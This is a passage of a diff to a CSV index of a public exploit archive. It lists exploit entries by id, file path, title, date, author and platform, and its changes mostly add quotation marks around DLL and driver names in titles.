5.24 - Lang.php Remote File Inclusion",2007-02-02,"Hasadya Raed",php,webapps,0 29561,platforms/php/webapps/29561.txt,"Uebimiau 2.7.10 - 'index.php' Cross-Site Scripting",2007-02-02,Doz,php,webapps,0 @@ -26851,12 +26851,12 @@ id,file,description,date,author,platform,type,port 29735,platforms/hardware/remote/29735.rb,"D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow",2007-03-12,LSO,hardware,remote,0 29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 - ADODB-Connection.Inc.php Remote File Inclusion",2007-03-12,"RaeD Hasadya",php,webapps,0 29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - Check_Vote.php Local File Inclusion",2007-03-13,"BorN To K!LL",php,webapps,0 -29738,platforms/windows/dos/29738.txt,"Microsoft Windows XP/2000 - WinMM.dll .WAV Files Remote Denial of Service",2007-03-13,"Michal Majchrowicz",windows,dos,0 +29738,platforms/windows/dos/29738.txt,"Microsoft Windows XP/2000 - 'WinMM.dll' .WAV Files Remote Denial of Service",2007-03-13,"Michal Majchrowicz",windows,dos,0 29739,platforms/linux/remote/29739.txt,"Apache Tomcat 5.x/6.0.x - Directory Traversal",2007-03-14,"D. Matscheko",linux,remote,0 29740,platforms/windows/dos/29740.txt,"MiniGZip - Controls File_Compress Buffer Overflow",2007-03-14,starcadi,windows,dos,0 29741,platforms/windows/remote/29741.txt,"Microsoft Internet Explorer 7 - NavCancel.HTM Cross-Site Scripting",2007-03-14,"Aviv Raff",windows,remote,0 29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client - Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0 -29743,platforms/windows/dos/29743.txt,"Symantec SYMTDI.SYS Device Driver - Local Denial of Service",2007-03-15,"David Matousek",windows,dos,0 +29743,platforms/windows/dos/29743.txt,"Symantec 'SYMTDI.SYS' Device Driver - Local Denial of Service",2007-03-15,"David Matousek",windows,dos,0 29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 - 'index.php' Remote File Inclusion",2007-03-15,"Abdus Samad",php,webapps,0 29745,platforms/php/webapps/29745.txt,"Horde Framework 3.1.3 - 'login.php' Cross-Site Scripting",2007-03-15,"Moritz Naumann",php,webapps,0 29746,platforms/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x - Cleanup Cron Script Arbitrary File Deletion",2007-03-15,anonymous,linux,local,0 @@ -26940,7 +26940,7 @@ id,file,description,date,author,platform,type,port 30141,platforms/asp/webapps/30141.txt,"Hunkaray Okul Portaly 1.1 - Haberoku.asp SQL Injection",2007-06-04,ertuqrul,asp,webapps,0 30142,platforms/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow",2007-06-04,"KaiJern Lau",linux,remote,0 30143,platforms/php/webapps/30143.txt,"WebStudio CMS - 'index.php' Cross-Site Scripting",2007-06-04,"Glafkos Charalambous ",php,webapps,0 -30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 - eSellerateControl365.dll ActiveX Control Buffer Overflow",2007-06-04,shinnai,windows,remote,0 +30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 - 'eSellerateControl365.dll' ActiveX Control Buffer Overflow",2007-06-04,shinnai,windows,remote,0 30145,platforms/ios/webapps/30145.txt,"Feetan Inc WireShare 1.9.1 iOS - Persistent Exploit",2013-12-08,Vulnerability-Lab,ios,webapps,0 30146,platforms/ios/webapps/30146.txt,"Print n Share 5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,ios,webapps,0 30152,platforms/php/webapps/30152.txt,"My Databook - diary.php delete Parameter SQL Injection",2007-06-04,Serapis.net,php,webapps,0 @@ -26986,7 +26986,7 @@ id,file,description,date,author,platform,type,port 29809,platforms/linux/dos/29809.txt,"PulseAudio 0.9.5 - Assert() Remote Denial of Service",2007-04-02,"Luigi Auriemma",linux,dos,0 29810,platforms/windows/dos/29810.c,"Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista - ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos,0 -29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 - LPEXT.dll Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0 +29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 - 'LPEXT.dll' Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0 29815,platforms/hardware/remote/29815.rb,"Netgear ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,hardware,remote,443 29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0 29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - Fotokategori.asp SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0 @@ -27007,11 +27007,11 @@ id,file,description,date,author,platform,type,port 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 - editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29834,platforms/php/webapps/29834.txt,"WordPress Plugin dzs-videogallery - Arbitrary File Upload",2013-11-26,link_satisi,php,webapps,0 -29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor - DSKernel2.dll ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,windows,remote,0 +29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor - 'DSKernel2.dll' ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,windows,remote,0 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 - Hostname Remote Buffer Overflow",2007-04-30,"Thomas Pollet",windows,dos,0 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - /ecrire/trackback.php post_id Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x - /tools/thememng/index.php tool_url Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 -29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - SonicDVDDashVRNav.dll ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote,0 +29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - 'SonicDVDDashVRNav.dll' ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote,0 29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 - admin/index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 29843,platforms/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console - Directory Traversal",2007-04-11,"Patrick Webster",windows,remote,0 @@ -27183,7 +27183,7 @@ id,file,description,date,author,platform,type,port 30066,platforms/php/webapps/30066.txt,"Jetbox CMS 2.1 - Multiple SQL Injections",2007-05-21,"Jesper Jurcenoks",php,webapps,0 30067,platforms/windows/remote/30067.txt,"rdiffweb 0.3.5 - Directory Traversal",2007-05-22,"Jesus Roncero",windows,remote,0 30068,platforms/php/webapps/30068.txt,"Jetbox CMS 2.1 - Login Variable Cross-Site Scripting",2007-05-22,"Jesper Jurcenoks",php,webapps,0 -30069,platforms/windows/remote/30069.html,"Dart ZipLite Compression 1.8.5.3 - DartZipLite.dll ActiveX Control Buffer Overflow",2007-05-22,shinnai,windows,remote,0 +30069,platforms/windows/remote/30069.html,"Dart ZipLite Compression 1.8.5.3 - 'DartZipLite.dll' ActiveX Control Buffer Overflow",2007-05-22,shinnai,windows,remote,0 30070,platforms/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",php,webapps,0 30071,platforms/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 - Parser_Path Remote File Inclusion",2007-05-22,the_Edit0r,php,webapps,0 30072,platforms/php/webapps/30072.txt,"PsychoStats 3.0.6b - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-22,"John Martinelli",php,webapps,0 @@ -27212,8 +27212,8 @@ id,file,description,date,author,platform,type,port 30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 - Manufacturer.php SQL Injection",2007-05-29,"laurent gaffie",php,webapps,0 30102,platforms/php/webapps/30102.php,"Pheap 2.0 - config.php Pheap_Login Authentication Bypass",2007-05-30,Silentz,php,webapps,0 30103,platforms/php/webapps/30103.txt,"Particle Blogger 1.2.1 - Archives.php SQL Injection",2007-03-16,Serapis.net,php,webapps,0 -30104,platforms/windows/dos/30104.nasl,"F-Secure Policy Manager 7.00 - FSMSH.dll Remote Denial of Service",2007-05-30,"David Maciejak",windows,dos,0 -30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows - Corefoundation.dll Denial of Service",2007-06-16,Lostmon,windows,dos,0 +30104,platforms/windows/dos/30104.nasl,"F-Secure Policy Manager 7.00 - 'FSMSH.dll' Remote Denial of Service",2007-05-30,"David Maciejak",windows,dos,0 +30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows - 'Corefoundation.dll' Denial of Service",2007-06-16,Lostmon,windows,dos,0 30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows - Document.Location Denial of Service",2007-06-16,azizov,windows,dos,0 30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal (Metasploit)",2013-12-11,Metasploit,windows,remote,8080 30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Login Bypass (Metasploit)",2013-12-11,Metasploit,multiple,remote,80 @@ -27343,7 +27343,7 @@ id,file,description,date,author,platform,type,port 30380,platforms/php/webapps/30380.txt,"CPanel 10.9.1 - Resname Parameter Cross-Site Scripting",2007-07-24,"Aria-Security Team",php,webapps,0 30381,platforms/windows/remote/30381.txt,"Multiple Browsers - URI Handlers Command Injection Vulnerabilities",2007-07-25,"Billy Rios",windows,remote,0 30336,platforms/windows/local/30336.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow (DEP Bypass) (2)",2013-12-16,"Morteza Hashemi",windows,local,0 -30802,platforms/windows/local/30802.c,"VMware Tools 3.1 - HGFS.Sys Privilege Escalation",2007-11-24,SoBeIt,windows,local,0 +30802,platforms/windows/local/30802.c,"VMware Tools 3.1 - 'HGFS.Sys' Privilege Escalation",2007-11-24,SoBeIt,windows,local,0 30803,platforms/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 - Login SQL Injection",2007-11-24,"Aria-Security Team",php,webapps,0 30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer - 'default.asp' SQL Injection",2007-11-21,"Aria-Security Team",asp,webapps,0 30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection",2007-11-21,The-0utl4w,asp,webapps,0 @@ -27364,7 +27364,7 @@ id,file,description,date,author,platform,type,port 30800,platforms/asp/webapps/30800.html,"FooSun - Api_Response.asp SQL Injection",2007-11-23,flyh4t,asp,webapps,0 30395,platforms/php/dos/30395.txt,"PHP openssl_x509_parse() - Memory Corruption",2013-12-17,"Stefan Esser",php,dos,0 30396,platforms/php/webapps/30396.txt,"Ditto Forensic FieldStation 2013Oct15a - Multiple Vulnerabilities",2013-12-17,"Martin Wundram",php,webapps,80 -30397,platforms/windows/dos/30397.txt,"Microsoft Windows Kernel win32k.sys - Integer Overflow (MS13-101)",2013-12-17,"Core Security",windows,dos,0 +30397,platforms/windows/dos/30397.txt,"Microsoft Windows Kernel 'win32k.sys' - Integer Overflow (MS13-101)",2013-12-17,"Core Security",windows,dos,0 30398,platforms/php/webapps/30398.txt,"InstantCMS 1.10.3 - Blind SQL Injection",2013-12-17,"High-Tech Bridge SA",php,webapps,80 30399,platforms/aix/local/30399.c,"IBM AIX 5.2/5.3 - Capture Command Local Stack Based Buffer Overflow",2007-07-26,qaaz,aix,local,0 40520,platforms/windows/local/40520.txt,"ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local,0 @@ -27399,7 +27399,7 @@ id,file,description,date,author,platform,type,port 30428,platforms/asp/webapps/30428.txt,"Real Estate Listing Website Application Template Login Dialog - SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30429,platforms/php/webapps/30429.txt,"phpCoupon - Remote Payment Bypass",2007-07-28,freeprotect.net,php,webapps,0 30430,platforms/linux/dos/30430.txt,"Fail2ban 0.8 - Remote Denial of Service",2007-07-28,"Daniel B. Cid",linux,dos,0 -30431,platforms/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 - BaiduBar.dll ActiveX Control Remote Code Execution",2007-07-29,cocoruder,windows,remote,0 +30431,platforms/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 - 'BaiduBar.dll' ActiveX Control Remote Code Execution",2007-07-29,cocoruder,windows,remote,0 30432,platforms/novell/remote/30432.txt,"Novell Groupwise 6.5 Webaccess - User.Id Parameter Cross-Site Scripting",2007-07-30,0x000000,novell,remote,0 30433,platforms/php/webapps/30433.txt,"IT!CMS 0.2 - lang-en.php wndtitle Parameter Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 30434,platforms/php/webapps/30434.txt,"IT!CMS 0.2 - menu-ed.php wndtitle Parameter Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 @@ -27457,17 +27457,17 @@ id,file,description,date,author,platform,type,port 30487,platforms/php/webapps/30487.txt,"PHP-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0 30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 - 'index.php' Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps,0 30489,platforms/php/webapps/30489.txt,"Openads (PHPAdsNew) <=c 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0 -30490,platforms/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 - TBLinf32.dll ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",windows,remote,0 +30490,platforms/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 - 'TBLinf32.dll' ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",windows,remote,0 30491,platforms/multiple/remote/30491.java,"OWASP Stinger - Filter Bypass",2007-08-13,"Meder Kydyraliev",multiple,remote,0 30492,platforms/php/webapps/30492.txt,"SkilMatch Systems JobLister3 - 'index.php' SQL Injection",2007-07-13,joseph.giron13,php,webapps,0 30493,platforms/windows/remote/30493.js,"Microsoft XML Core Services 6.0 - SubstringData Integer Overflow",2007-08-14,anonymous,windows,remote,0 -30494,platforms/windows/dos/30494.html,"Microsoft Internet Explorer 5.0.1 - Vector Markup Language VGX.dll Remote Buffer Overflow",2007-08-14,"Ben Nagy and Derek Soeder",windows,dos,0 +30494,platforms/windows/dos/30494.html,"Microsoft Internet Explorer 5.0.1 - Vector Markup Language 'VGX.dll' Remote Buffer Overflow",2007-08-14,"Ben Nagy and Derek Soeder",windows,dos,0 30495,platforms/multiple/remote/30495.html,"Apache Tomcat 6.0.13 - Host Manager Servlet Cross-Site Scripting",2007-08-14,"NTT OSS CENTER",multiple,remote,0 30496,platforms/multiple/remote/30496.txt,"Apache Tomcat 6.0.13 - Cookie Handling Quote Delimiter Session ID Disclosure",2007-08-14,"Tomasz Kuczynski",multiple,remote,0 30497,platforms/multiple/dos/30497.c,"Zoidcom 0.6.x - Malformed Packet Denial of Service",2007-08-14,"Luigi Auriemma",multiple,dos,0 30498,platforms/multiple/dos/30498.txt,"Live For Speed S1/S2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",multiple,dos,0 30499,platforms/multiple/remote/30499.txt,"RndLabs Babo Violent 2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",multiple,remote,0 -30500,platforms/windows/dos/30500.txt,"Yahoo! Messenger 8.1 - KDU_V32M.DLL Remote Denial of Service",2007-08-15,team509,windows,dos,0 +30500,platforms/windows/dos/30500.txt,"Yahoo! Messenger 8.1 - 'KDU_V32M.DLL' Remote Denial of Service",2007-08-15,team509,windows,dos,0 30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Inclusion",2007-07-09,Crackers_Child,php,webapps,0 30502,platforms/java/remote/30502.txt,"Sun Java Runtime Environment 1.4.2 - Font Parsing Privilege Escalation",2007-08-15,"John Heasman",java,remote,0 30503,platforms/linux/local/30503.txt,"BlueCat Networks Adonis 5.0.2.8 - CLI Privilege Escalation",2007-08-16,forloop,linux,local,0 @@ -27538,13 +27538,13 @@ id,file,description,date,author,platform,type,port 30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0 30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 - autohtml.php Local File Inclusion",2007-11-10,d3v1l,php,webapps,0 30882,platforms/hardware/remote/30882.txt,"Thomson SpeedTouch 716 - URL Parameter Cross-Site Scripting",2007-11-10,"Remco Verhoef",hardware,remote,0 -30883,platforms/windows/remote/30883.js,"BitDefender AntiVirus 2008 - bdelev.dll ActiveX Control Double-Free",2007-11-11,"Lionel d'Hauenens",windows,remote,0 +30883,platforms/windows/remote/30883.js,"BitDefender AntiVirus 2008 - 'bdelev.dll' ActiveX Control Double-Free",2007-11-11,"Lionel d'Hauenens",windows,remote,0 30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0 30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scripting",2007-09-04,"Tushar Vartak",jsp,webapps,0 30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 - 'login.asp' SQL Injection",2007-09-04,SmOk3,asp,webapps,0 -30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE 7-zip32.dll 4.42 - Heap Based Buffer Overflow",2007-09-04,miyy3t,windows,remote,0 +30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Based Buffer Overflow",2007-09-04,miyy3t,windows,remote,0 30566,platforms/multiple/dos/30566.txt,"Alien Arena 2007 6.10 - Multiple Remote Vulnerabilities",2007-09-05,"Luigi Auriemma",multiple,dos,0 -30567,platforms/windows/remote/30567.html,"Microsoft Agent agentdpv.dll ActiveX Control - Malformed URL Stack Buffer Overflow",2007-09-11,"Yamata Li",windows,remote,0 +30567,platforms/windows/remote/30567.html,"Microsoft Agent - 'agentdpv.dll' ActiveX Control Malformed URL Stack Buffer Overflow",2007-09-11,"Yamata Li",windows,remote,0 30568,platforms/php/webapps/30568.txt,"Pulsewiki And Pawfaliki 0.5.1 - 'index.php' Local File Inclusion",2007-09-06,mafialbano,php,webapps,0 30569,platforms/windows/remote/30569.py,"Unreal Commander 0.92 - Directory Traversal",2007-09-06,"Gynvael Coldwind",windows,remote,0 30570,platforms/php/webapps/30570.txt,"Toms Gastebuch 1.00/1.01 - header.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-08,hd1979,php,webapps,0 @@ -27699,8 +27699,8 @@ id,file,description,date,author,platform,type,port 30677,platforms/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module - SQL Injection",2007-10-16,"Humberto J. Abdelnur",linux,remote,0 30678,platforms/multiple/remote/30678.java,"Nortel Networks UNIStim IP SoftPhone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",multiple,remote,0 30679,platforms/hardware/dos/30679.pl,"Nortel Networks - Multiple UNIStim VoIP Products Remote Eavesdrop",2007-10-18,"Daniel Stirnimann",hardware,dos,0 -30680,platforms/windows/local/30680.txt,"Macrovision SafeDisc - SecDRV.SYS Method_Neither Privilege Escalation",2007-10-18,"Elia Florio",windows,local,0 -30681,platforms/windows/local/30681.txt,"SpeedFan - Speedfan.sys Privilege Escalation",2007-10-18,"Ruben Santamarta ",windows,local,0 +30680,platforms/windows/local/30680.txt,"Macrovision SafeDisc - 'SecDRV.SYS' Method_Neither Privilege Escalation",2007-10-18,"Elia Florio",windows,local,0 +30681,platforms/windows/local/30681.txt,"SpeedFan - 'Speedfan.sys' Privilege Escalation",2007-10-18,"Ruben Santamarta ",windows,local,0 30682,platforms/php/webapps/30682.txt,"SiteBar 3.3.8 - translator.php dir Parameter Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps,0 30683,platforms/php/webapps/30683.txt,"SiteBar 3.3.8 - (translator.php) upd cmd Action edit Variable Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0 30684,platforms/php/webapps/30684.txt,"SiteBar 3.3.8 - integrator.php lang Parameter Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 @@ -27714,7 +27714,7 @@ id,file,description,date,author,platform,type,port 31028,platforms/php/webapps/31028.txt,"Article Dashboard - 'admin/login.php' Multiple SQL Injection",2008-01-15,Xcross87,php,webapps,0 31029,platforms/php/webapps/31029.pl,"WordPress Plugin Peter's Math Anti-Spam 0.1.6 - Audio CAPTCHA Security Bypass",2008-01-15,Romero,php,webapps,0 30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 -30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,windows,remote,0 +30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - 'ierpplug.dll' ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,windows,remote,0 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 30694,platforms/php/webapps/30694.txt,"Socketmail 2.2.1 - lostpwd.php Cross-Site Scripting",2007-10-19,"Ivan Sanchez",php,webapps,0 30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 - rnote.php Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0 @@ -27743,7 +27743,7 @@ id,file,description,date,author,platform,type,port 30720,platforms/windows/remote/30720.html,"GlobalLink 2.7.0.8 - ConnectAndEnterRoom ActiveX Control Stack Buffer Overflow",2007-10-29,anonymous,windows,remote,0 30806,platforms/php/webapps/30806.txt,"PHPSlideShow 0.9.9 - Directory Parameter Cross-Site Scripting",2007-11-26,"Jose Luis Gongora Fernandez",php,webapps,0 30807,platforms/asp/webapps/30807.txt,"GOUAE DWD Realty - Password Parameters SQL Injection",2007-11-26,"Aria-Security Team",asp,webapps,0 -30808,platforms/cgi/webapps/30808.txt,"GWExtranet 3.0 - Scp.dll Multiple HTML Injection Vulnerabilities",2007-11-26,Doz,cgi,webapps,0 +30808,platforms/cgi/webapps/30808.txt,"GWExtranet 3.0 - 'Scp.dll' Multiple HTML Injection Vulnerabilities",2007-11-26,Doz,cgi,webapps,0 30723,platforms/hardware/webapps/30723.php,"Seagate BlackArmor - Root Exploit",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30724,platforms/linux/dos/30724.txt,"Perdition 1.17 - IMAPD __STR_VWRITE Remote Format String",2007-10-31,"Bernhard Mueller",linux,dos,0 30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 @@ -27814,7 +27814,7 @@ id,file,description,date,author,platform,type,port 30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 30811,platforms/php/webapps/30811.txt,"SimpleGallery 0.1.3 - 'index.php' Cross-Site Scripting",2007-11-26,JosS,php,webapps,0 -30812,platforms/windows/dos/30812.html,"RealMedia RealPlayer 10.5/11 - ierpplug.dll PlayerProperty ActiveX Control Buffer Overflow",2007-11-26,"Elazar Broad",windows,dos,0 +30812,platforms/windows/dos/30812.html,"RealMedia RealPlayer 10.5/11 - 'ierpplug.dll' PlayerProperty ActiveX Control Buffer Overflow",2007-11-26,"Elazar Broad",windows,dos,0 30813,platforms/php/webapps/30813.txt,"FMDeluxe 2.1 - 'index.php' Cross-Site Scripting",2007-11-26,JosS,php,webapps,0 30814,platforms/multiple/dos/30814.txt,"Skype 3.6.216 - Voicemail URI Handler Remote Denial of Service",2007-11-26,"Critical Security",multiple,dos,0 30815,platforms/php/webapps/30815.txt,"Tilde 4.0 - Aarstal Parameter Cross-Site Scripting",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 @@ -28258,7 +28258,7 @@ id,file,description,date,author,platform,type,port 31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0 31288,platforms/php/webapps/31288.txt,"Joomla! / Mambo Component com_hello_world - 'id' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0 31289,platforms/php/webapps/31289.txt,"PHP-Nuke Gallery 1.3 Module - 'artid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0 -31290,platforms/php/webapps/31290.txt,"AuraCMS 2.2 - 'lihatberita' Module 'id' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0 +31290,platforms/php/webapps/31290.txt,"AuraCMS 2.2 - 'lihatberita' Module SQL Injection",2008-02-23,S@BUN,php,webapps,0 31291,platforms/php/webapps/31291.txt,"Joomla! / Mambo Component com_publication - 'pid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0 31292,platforms/php/webapps/31292.txt,"Joomla! / Mambo Component com_blog - 'pid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0 31293,platforms/php/webapps/31293.txt,"Gary's Cookbook 3.0 - 'id' Parameter SQL Injection",2008-02-25,S@BUN,php,webapps,0 @@ -28320,7 +28320,7 @@ id,file,description,date,author,platform,type,port 31360,platforms/windows/dos/31360.txt,"MailEnable 3.13 - IMAP Service Multiple Remote Vulnerabilities",2008-03-07,"Luigi Auriemma",windows,dos,0 31361,platforms/windows/dos/31361.txt,"Microsoft Office 2000/2003/2004/XP - File Memory Corruption",2008-03-07,anonymous,windows,dos,0 31362,platforms/multiple/remote/31362.txt,"Neptune Web Server 3.0 - 404 Error Page Cross-Site Scripting",2008-03-07,NetJackal,multiple,remote,0 -31363,platforms/windows/dos/31363.txt,"Panda Internet Security/AntiVirus+Firewall 2008 - CPoint.sys Memory Corruption",2008-03-08,"Tobias Klein",windows,dos,0 +31363,platforms/windows/dos/31363.txt,"Panda Internet Security/AntiVirus+Firewall 2008 - 'CPoint.sys' Memory Corruption",2008-03-08,"Tobias Klein",windows,dos,0 31364,platforms/hardware/remote/31364.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Console HTML Injection",2008-03-08,nnposter,hardware,remote,0 31365,platforms/php/webapps/31365.txt,"Alkacon OpenCMS 7.0.3 - logfileViewSettings.jsp filePath Parameter Cross-Site Scripting",2008-03-08,nnposter,php,webapps,0 31366,platforms/php/webapps/31366.txt,"Alkacon OpenCMS 7.0.3 - logfileViewSettings.jsp filePath.0 Parameter Arbitrary File Access",2008-03-08,nnposter,php,webapps,0 @@ -28687,7 +28687,7 @@ id,file,description,date,author,platform,type,port 31751,platforms/php/webapps/31751.txt,"Sphider 1.3.4 - 'query' Parameter Cross-Site Scripting",2008-05-06,"Christian Holler",php,webapps,0 31752,platforms/php/webapps/31752.txt,"Forum Rank System 6 - 'settings['locale']' Parameter Multiple Local File Inclusion",2008-05-07,Matrix86,php,webapps,0 31753,platforms/php/webapps/31753.txt,"Tux CMS 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-07,"Hadi Kiamarsi",php,webapps,0 -31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu WGate wgate.dll ~service Parameter Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 +31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu WGate 'wgate.dll' ~service Parameter Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 31756,platforms/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",multiple,remote,0 31757,platforms/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",multiple,remote,0 @@ -29430,7 +29430,7 @@ id,file,description,date,author,platform,type,port 32569,platforms/ios/webapps/32569.txt,"iStArtApp FileXChange 6.2 